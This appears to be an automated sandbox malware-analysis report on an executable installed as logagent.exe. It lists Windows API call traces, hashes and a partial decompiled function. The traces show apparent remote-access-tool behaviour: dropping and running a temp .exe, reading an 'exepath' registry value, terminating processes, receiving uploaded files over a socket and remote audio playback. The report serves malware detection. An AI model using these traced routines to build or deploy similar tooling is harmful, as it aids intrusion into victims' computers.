                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000), ref: 0040AA15
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AA1F
                                  • GetTempPathW.KERNEL32(00000104,?), ref: 0040AA63
                                  • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0040AA7E
                                  • lstrcatW.KERNEL32(?,.exe), ref: 0040AA90
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000), ref: 0040AAA2
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AAAC
                                    • Part of subcall function 00412D56: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041623C), ref: 00412D93
                                  • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0040AAD2
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524,80000001), ref: 0040AAE4
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524), ref: 0040AAFE
                                  • Sleep.KERNEL32(000001F4), ref: 0040AB15
                                  • exit.MSVCRT ref: 0040AB2A
                                  • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BA28,00415800,00000000,80000001,0041BA38), ref: 0040AB4C
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040AB78
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AB81
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,00000000,00000410,00000000), ref: 0040AB9E
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(?), ref: 0040ABC2
                                  • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BA28,00415800), ref: 0040ABD2
                                  • Sleep.KERNEL32(00000BB8), ref: 0040ABF9
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040AC0D
                                    • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,00415628,0041BA28,00415628,00000001,C:\Windows\SysWOW64\logagent.exe,0041BA28,00415A24,?,00408003), ref: 00407D7A
                                    • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,C:\Windows\SysWOW64\logagent.exe,0041BA28,00415A24,?,00408003), ref: 00407D84
                                    • Part of subcall function 00407D53: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,C:\Windows\SysWOW64\logagent.exe), ref: 00407DA4
                                    • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,00415628,0041BA28,00415628,00000001,C:\Windows\SysWOW64\logagent.exe,0041BA28,00415A24), ref: 00407DBE
                                    • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,C:\Windows\SysWOW64\logagent.exe,0041BA28,00415A24), ref: 00407DC8
                                    • Part of subcall function 00407D53: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,C:\Windows\SysWOW64\logagent.exe), ref: 00407DE8
                                    • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(00000001,00415628,0041BA28,00415628,00000001,C:\Windows\SysWOW64\logagent.exe,0041BA28,00415A24), ref: 00407E02
                                    • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,C:\Windows\SysWOW64\logagent.exe,0041BA28,00415A24), ref: 00407E0C
                                    • Part of subcall function 00407D53: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,C:\Windows\SysWOW64\logagent.exe), ref: 00407E2C
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003), ref: 0040AC32
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AC3B
                                  • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040AC44
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040AC51
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,00000000), ref: 0040AC62
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$G@std@@$?c_str@?$basic_string@$G@2@@0@V?$basic_string@$G@2@@std@@$?size@?$basic_string@Hstd@@$File$??1?$basic_string@V10@V10@@exit$??8std@@CloseCreateNameOpenPathProcessSleepTemp$??0?$basic_string@??4?$basic_string@CurrentD@1@@ExecuteExistsHandleModuleMutexObjectQueryShellSingleV01@ValueWaitlstrcat
                                  • String ID: .exe$WDH$exepath$open$temp_
                                  • API String ID: 2802067201-3088914985
                                  • Opcode ID: e60b4f53b04ab762f7559d9111cd6afd6eea4163d5e6db4c9e15300d959ee8cd
                                  • Instruction ID: 71612b700bd92f7f916ca3283b0c55b6d5dde9a5cbb5d2c431e2c067e6a7b7c7
                                  • Opcode Fuzzy Hash: e60b4f53b04ab762f7559d9111cd6afd6eea4163d5e6db4c9e15300d959ee8cd
                                  • Instruction Fuzzy Hash: E5919772640608BBDB115BA0DC49FEF376DEB88341F10407AFA06E61D1DBB84995CBAD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 25%
                                  			E00411D8A(WCHAR* __eax, char _a4, intOrPtr _a20, intOrPtr _a24, char _a27) {
                                  				char _v20;
                                  				char _v36;
                                  				char _v52;
                                  				char _v68;
                                  				char _v84;
                                  				char _v88;
                                  				char* _t35;
                                  				char* _t36;
                                  				char* _t37;
                                  				WCHAR* _t38;
                                  				void* _t43;
                                  				void* _t47;
                                  				intOrPtr* _t50;
                                  				intOrPtr _t78;
                                  				intOrPtr _t79;
                                  				intOrPtr _t86;
                                  				intOrPtr _t87;
                                  				intOrPtr* _t88;
                                  				void* _t91;
                                  
                                  				_t30 = __eax;
                                  				__imp__?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z(0x5c, 0);
                                  				if(__eax ==  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					_t30 = E004135DE();
                                  					_t91 = _t91 + 0xc;
                                  					__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t30,  &_v36, 0x30, __eax);
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				}
                                  				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                  				if(_t30 <= 0) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					if(PathFileExistsW(_t30) != 0) {
                                  						goto L4;
                                  					} else {
                                  						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_a27);
                                  						_t47 = E004020C2(0x41c178, 0xa8, 0x415664);
                                  					}
                                  				} else {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(_a24, _t30);
                                  					E00412E4E(_t30);
                                  					_t91 = _t91 - 0x10 + 0x14;
                                  					L4:
                                  					_t35 =  &_v68;
                                  					L0041416A();
                                  					_t36 =  &_v52;
                                  					L00414146();
                                  					_t37 =  &_v36;
                                  					L0041414C();
                                  					_t38 =  &_v20;
                                  					L00414146();
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t38, _t37, _t37, _t36, _t36, _t35, _t35, L"open \"",  &_a4, L"\" type ", E00412795( &_v84, _a20), L" alias audio");
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					mciSendStringW(_t38, 0, 0, 0);
                                  					mciSendStringA("play audio", 0, 0, 0);
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_a27);
                                  					E004020C2(0x41c178, 0xa9, 0x415664);
                                  					_t43 = CreateEventA(0, 1, 0, 0);
                                  					 *0x41c1d4 = _t43;
                                  					if(_t43 != 0) {
                                  						do {
                                  							if( *0x41c1d2 != 0) {
                                  								mciSendStringA("pause audio", 0, 0, 0);
                                  								 *0x41c1d2 = 0;
                                  							}
                                  							if( *0x41c1d3 != 0) {
                                  								mciSendStringA("resume audio", 0, 0, 0);
                                  								 *0x41c1d3 = 0;
                                  							}
                                  							mciSendStringA("status audio mode",  &_v88, 0x14, 0);
                                  							_t50 = "stopped";
                                  							_t88 =  &_v88;
                                  							while(1) {
                                  								_t86 =  *_t88;
                                  								_t78 = _t86;
                                  								if(_t86 !=  *_t50) {
                                  									break;
                                  								}
                                  								if(_t78 == 0) {
                                  									L14:
                                  									_t50 = 0;
                                  								} else {
                                  									_t87 =  *((intOrPtr*)(_t88 + 1));
                                  									_t79 = _t87;
                                  									if(_t87 !=  *((intOrPtr*)(_t50 + 1))) {
                                  										break;
                                  									} else {
                                  										_t88 = _t88 + 2;
                                  										_t50 = _t50 + 2;
                                  										if(_t79 != 0) {
                                  											continue;
                                  										} else {
                                  											goto L14;
                                  										}
                                  									}
                                  								}
                                  								goto L18;
                                  							}
                                  							asm("sbb eax, eax");
                                  							asm("sbb eax, 0xffffffff");
                                  							L18:
                                  							if(_t50 == 0) {
                                  								SetEvent( *0x41c1d4);
                                  							}
                                  							if(WaitForSingleObject( *0x41c1d4, 0x1f4) == 0) {
                                  								CloseHandle( *0x41c1d4);
                                  								 *0x41c1d4 = 0;
                                  							}
                                  						} while ( *0x41c1d4 != 0);
                                  					}
                                  					mciSendStringA("stop audio", 0, 0, 0);
                                  					mciSendStringA("close audio", 0, 0, 0);
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_a27);
                                  					_t47 = E004020C2(0x41c178, 0xaa, 0x415664);
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				}
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				return _t47;
                                  			}

                                  APIs
                                  • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z.MSVCP60(0000005C,00000000,?,0041B310), ref: 00411D9B
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,0041B310), ref: 00411DAE
                                    • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,0041B310), ref: 00411DC7
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,0041B310), ref: 00411DD0
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,0041B310), ref: 00411DD9
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,0041B310), ref: 00411DEA
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00411DF9
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,open ",?," type ,00000000, alias audio,?,0041B310), ref: 00411E2D
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,0041B310), ref: 00411E3A
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310), ref: 00411E47
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310), ref: 00411E54
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E5F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E68
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E71
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E7A
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E86
                                  • mciSendStringW.WINMM(00000000), ref: 00411E8D
                                  • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 00411EA1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 00411EB1
                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9), ref: 00411ECB
                                  • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 00411EEE
                                  • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 00411F06
                                  • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 00411F1A
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,0041B310), ref: 00411F46
                                  • PathFileExistsW.SHLWAPI(00000000,?,0041B310), ref: 00411F4D
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 00411F69
                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411F92
                                  • WaitForSingleObject.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411FA3
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411FB3
                                  • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00411FD3
                                  • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 00411FDD
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 00411FED
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(000000AA), ref: 00412005
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0041200E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@SendString$??0?$basic_string@D@2@@std@@D@std@@$?c_str@?$basic_string@G@2@@0@Hstd@@V?$basic_string@$D@1@@$EventV01@@V10@$??4?$basic_string@?find@?$basic_string@?length@?$basic_string@CloseCreateExistsFileG@1@@HandleObjectPathSingleV01@V10@0@V10@@Wait
                                  • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                  • API String ID: 1753768752-1354618412
                                  • Opcode ID: 765aabc8db0142e62955e7b1a7793da8d9cfa88518039bab73f2148d12eff53b
                                  • Instruction ID: 390487820da651bbbca776db698e462f264097bfb23042b57de684319bca0ea3
                                  • Opcode Fuzzy Hash: 765aabc8db0142e62955e7b1a7793da8d9cfa88518039bab73f2148d12eff53b
                                  • Instruction Fuzzy Hash: E1618271A9061CFFDB00AFA0DC89DFF3B6DEB54344B448026F902971A1DB799D848B69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664,[INFO],[DEBUG],00000000,?,004041B5,?,?,00000000), ref: 00403499
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034AC
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034B5
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034CE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00000000), ref: 004034DB
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004034F0
                                  • recv.WS2_32(00000000,?,0000FDE8,00000000), ref: 00403517
                                  • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(?,00000000,00000000,?,0000FDE8,00000000), ref: 00403534
                                  • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 00403541
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00403556
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 00403560
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000004,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00403578
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,nTotBytesRecv: ,00000000,?,?,?,?), ref: 004035BB
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?,?,?,nTotBytesRecv: ,00000000,?,?,?,?), ref: 004035CD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004035DE
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,FileSize: ,00000000,?,?,?,?), ref: 004035FB
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?,?,?,FileSize: ,00000000,?,?,?,?), ref: 00403608
                                    • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                    • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                    • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403619
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040362A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403633
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 004036F3
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000,?,0000FDE8,00000000), ref: 004036FE
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403707
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(File Upload: unexpected disconnection,?), ref: 0040371F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?), ref: 0040372F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@1@@D@2@@0@V?$basic_string@$Hstd@@$V01@V10@@$??4?$basic_string@?c_str@?$basic_string@V01@@V10@$??9std@@?append@?$basic_string@?empty@?$basic_string@?length@?$basic_string@?size@?$basic_string@LocalTimeV10@0@V12@Y?$basic_string@printfrecv
                                  • String ID: File Upload: unexpected disconnection$FileSize: $[DEBUG]$[INFO]$nTotBytesRecv:
                                  • API String ID: 2510920776-3166941866
                                  • Opcode ID: 0fd7534d0b1fd9e58be76c0a3dd4330a8e1245cd190f172d0bc5a71bc7ecd19e
                                  • Instruction ID: 46474c331338e0ade551c9c3ffb0e9ad5c3b9d5b5a2bd20438cea0ecd9357ef1
                                  • Opcode Fuzzy Hash: 0fd7534d0b1fd9e58be76c0a3dd4330a8e1245cd190f172d0bc5a71bc7ecd19e
                                  • Instruction Fuzzy Hash: 6D810B7290050DEBCB05EF90DC999EEBB7CEF54356F00406AF516A31A0DB749A85CFA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 0040AC8C: TerminateProcess.KERNEL32(00000000,00000000,004085BA), ref: 0040AC9C
                                    • Part of subcall function 0040AC8C: WaitForSingleObject.KERNEL32(000000FF), ref: 0040ACAF
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004089BD
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004089C6
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,?,00000208,00000000), ref: 004089E4
                                    • Part of subcall function 0040B692: RegOpenKeyExA.KERNELBASE(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                    • Part of subcall function 0040B692: RegQueryValueExA.KERNELBASE(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                    • Part of subcall function 0040B692: RegCloseKey.KERNELBASE(0040936A), ref: 0040B6D3
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 00408A07
                                  • _wgetenv.MSVCRT ref: 00408A1B
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 00408A26
